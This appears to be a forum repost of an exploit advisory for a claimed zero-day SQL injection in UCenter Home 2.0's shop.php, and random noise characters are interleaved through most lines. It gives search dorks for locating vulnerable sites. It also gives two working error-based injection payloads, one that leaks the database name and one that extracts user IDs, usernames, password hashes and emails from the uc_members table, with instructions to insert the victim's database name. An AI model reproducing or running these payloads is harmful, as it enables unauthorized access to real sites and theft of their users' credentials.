7 S1 i8 J! g& v% z$ h1 _* o8 \__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
5 O$ d3 ?4 T+ o# z, ~/ W8 I- |3 ]+ y5 p4 ]) p
. Q0 t8 ]# T! s& A" e9 F, d
, S. m, m; g/ c! {: ?; p: f1 q
*/ Author : KnocKout : C7 k# q; A/ f
( h4 x" ]. d, y*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers ; K# ^. x0 D u, C, W
' \0 V7 ~8 [ r$ k4 C T*/ Contact: knockoutr@msn.com 6 G9 _ e2 L7 }) x
4 ^* z Z- X/ v, [( E*/ Cyber-Warrior.org/CWKnocKout 0 D8 L+ q! s4 B1 A' }0 j3 {& F
0 a1 G$ ]0 v+ ]4 r6 s a \8 t
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
& q% j* V5 `1 }7 O" ~2 e+ P* n* l' o; X
Script : UCenter Home
6 |' z5 t5 R$ N
% U5 U! v$ V: NVersion : 2.0 9 A6 s9 e. J$ ~1 i
. V9 }4 Y. i5 w& |: k4 G! S6 j7 U( kScript HomePage : http://u.discuz.net/ ; i: c k2 N) M5 w, E8 ]$ w
' ]3 n% D7 _2 l( K" H
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 Z& U+ R1 Z. s; W3 b
: g+ X$ ^1 `( M* R- l# g; x
Dork : Powered by UCenter inurl:shop.php?ac=view ; {/ c' `: }# z- d( I% A
" N: S3 P' r( m z" O' ^4 v
Dork 2 : inurl:shop.php?ac=view&shopid= ) R! [1 B) F/ u# l0 C. D; H T
9 M/ h9 w4 k2 j" V- `__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== ( Q3 c" h; R. i7 D
0 ^. N" l* E; ~) ~Vuln file : Shop.php
! ~7 ^' Y" T% i& |& ?# \7 `
% w% w! X$ g6 n. `8 ^value's : (?)ac=view&shopid=
& \$ E1 w6 |8 ]* @) ?2 D7 ^2 v& I. c+ z
Vulnerable Style : SQL Injection (MySQL Error Based)
% C3 H* F3 U8 m" H: E2 Q5 c
% v: S; R7 ^8 `, R. i9 y. n' S" iNeed Metarials : Hex Conversion
2 E, ~# O. M# x% u( O u/ y/ }' b) ?+ g2 Z
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== & n' s. V6 a8 s% j
2 ~6 G" N+ c; }! Z1 IYour Need victim Database name.
) O' ]7 C3 S t) V. ?6 S1 r
2 A4 A3 @) j& r& m7 i, J* Ufor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 e. O2 l7 l$ g: y& m% H) M, W9 d) f9 x4 |6 `
.. 0 X D' M2 t' A" |5 M$ o
B; X- ~6 u4 Q1 Y' @9 [; H
DB : Okey. + A; H% X7 V$ P$ b/ I; j& J# ~
( a/ W! F. T- i+ ^, P. O
your edit DB `[TARGET DB NAME]` 1 q+ }) H6 D* X7 K5 N2 P% n, G8 a
# w" x* y/ }9 l6 ?. q* m* ]
Example : 'hiwir1_ucenter'
- g- `& p2 ?* X6 q2 A8 d$ U% e
8 E5 `/ B. E u6 J1 \* A( qEdit : Okey.
& o Y$ U8 w, r: A u5 K7 F0 W7 \ p8 {; R. R- \, L
Your use Hex conversion. And edit Your SQL Injection Exploit..
5 d# f" h" \8 f# F$ ]) `0 x+ m( [9 B1 T. |
5 K V. @3 w" Z3 p) y
5 @3 b& @! y+ [1 o G( z- q4 a: a5 ^
Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
3 U! F5 A$ b8 H6 w( V6 `+ I% r |
发表于 2013-2-27 21:31:31
收藏
支持
反对